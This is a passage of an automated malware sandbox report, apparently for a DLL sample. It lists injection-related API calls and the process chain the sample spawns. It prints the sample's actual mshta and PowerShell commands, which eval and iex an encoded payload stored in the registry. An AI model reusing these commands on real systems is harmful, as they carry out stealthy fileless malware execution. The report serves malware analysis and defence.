            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE73583_2_04BE7358
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120DF74_2_01120DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120DF94_2_01120DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC1DEA4_2_05EC1DEA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA2D254_2_05EA2D25
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBF4D04_2_05EBF4D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB2CB84_2_05EB2CB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC0CB24_2_05EC0CB2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAF6414_2_05EAF641
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC01A54_2_05EC01A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB39244_2_05EB3924
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA68B24_2_05EA68B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0105436E5_2_0105436E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01054BB35_2_01054BB3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010580D05_2_010580D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0DF95_2_00EB0DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0DF75_2_00EB0DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05112D255_2_05112D25
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05131D925_2_05131D92
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05131DEA5_2_05131DEA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051314185_2_05131418
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05130CB25_2_05130CB2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05122CB85_2_05122CB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512F4D05_2_0512F4D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511F6415_2_0511F641
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051239245_2_05123924
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051301A55_2_051301A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051168B25_2_051168B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051373585_2_05137358
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D9499 CreateProcessAsUserW,1_2_046D9499
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C12F8D GetProcAddress,NtCreateSection,memset,1_2_01C12F8D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C1373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_01C1373D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C14AAF NtMapViewOfSection,1_2_01C14AAF
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C182F5 NtQueryVirtualMemory,1_2_01C182F5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0880 NtAllocateVirtualMemory,1_2_00DC0880
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0AB8 NtProtectVirtualMemory,1_2_00DC0AB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_046CB45A
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_046CD4F4
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,1_2_046CE4DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046D70AC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,1_2_046D4560
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046E3E7D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DD6E3 NtQueryInformationProcess,1_2_046DD6E3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DBEBC GetProcAddress,NtCreateSection,memset,1_2_046DBEBC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_046C6F70
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D0FE0 NtMapViewOfSection,1_2_046D0FE0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,1_2_046CA7FE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,1_2_046CAFD1
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CECE9 NtGetContextThread,RtlNtStatusToDosError,1_2_046CECE9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DF0CC memset,NtQueryInformationProcess,1_2_046DF0CC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,1_2_046C1D70
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046D595B
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,1_2_046DA1FC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E2588 NtQuerySystemInformation,RtlNtStatusToDosError,1_2_046E2588
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_046C3EBE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_046D630F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_031F373D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F2F8D GetProcAddress,NtCreateSection,memset,3_2_031F2F8D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F4AAF NtMapViewOfSection,3_2_031F4AAF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F82F5 NtQueryVirtualMemory,3_2_031F82F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04BCD4F4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_04BCE4DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_04BCB45A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_04BD4560
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDBEBC GetProcAddress,NtCreateSection,memset,3_2_04BDBEBC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDD6E3 NtQueryInformationProcess,3_2_04BDD6E3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BE3E7D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_04BCA7FE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD0FE0 NtMapViewOfSection,3_2_04BD0FE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,3_2_04BCAFD1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_04BC6F70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BD70AC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCECE9 NtGetContextThread,RtlNtStatusToDosError,3_2_04BCECE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE2588 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_04BE2588
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_04BC1D70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,3_2_04BC3EBE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDF0CC memset,NtQueryInformationProcess,3_2_04BDF0CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,3_2_04BDA1FC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BD595B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_04BD630F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120880 NtAllocateVirtualMemory,4_2_01120880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120AB8 NtProtectVirtualMemory,4_2_01120AB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,4_2_05EB4560
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_05EAD4F4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,4_2_05EAE4DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,4_2_05EAB45A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,4_2_05EAAFD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,4_2_05EA6F70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBD6E3 NtQueryInformationProcess,4_2_05EBD6E3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC2588 NtQuerySystemInformation,RtlNtStatusToDosError,4_2_05EC2588
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,4_2_05EA1D70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAECE9 NtGetContextThread,RtlNtStatusToDosError,4_2_05EAECE9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,4_2_05EA3EBE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC3E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EC3E7D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,4_2_05EBA1FC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EB595B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBF0CC memset,NtQueryInformationProcess,4_2_05EBF0CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB70AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EB70AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,4_2_05EB630F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0105373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_0105373D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01052F8D GetProcAddress,NtCreateSection,memset,5_2_01052F8D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01054AAF NtMapViewOfSection,5_2_01054AAF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010582F5 NtQueryVirtualMemory,5_2_010582F5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0AB8 NtProtectVirtualMemory,5_2_00EB0AB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0880 NtAllocateVirtualMemory,5_2_00EB0880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05124560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,5_2_05124560
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,5_2_0511B45A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,5_2_0511E4DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_0511D4F4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05116F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,5_2_05116F70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,5_2_0511AFD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512D6E3 NtQueryInformationProcess,5_2_0512D6E3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05111D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,5_2_05111D70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05132588 NtQuerySystemInformation,RtlNtStatusToDosError,5_2_05132588
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511ECE9 NtGetContextThread,RtlNtStatusToDosError,5_2_0511ECE9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05133E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_05133E7D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05113EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,5_2_05113EBE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_0512595B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,5_2_0512A1FC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051270AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_051270AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512F0CC memset,NtQueryInformationProcess,5_2_0512F0CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,5_2_0512630F
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: 61f113091fd0c.dllStatic PE information: invalid certificate
            Source: 61f113091fd0c.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
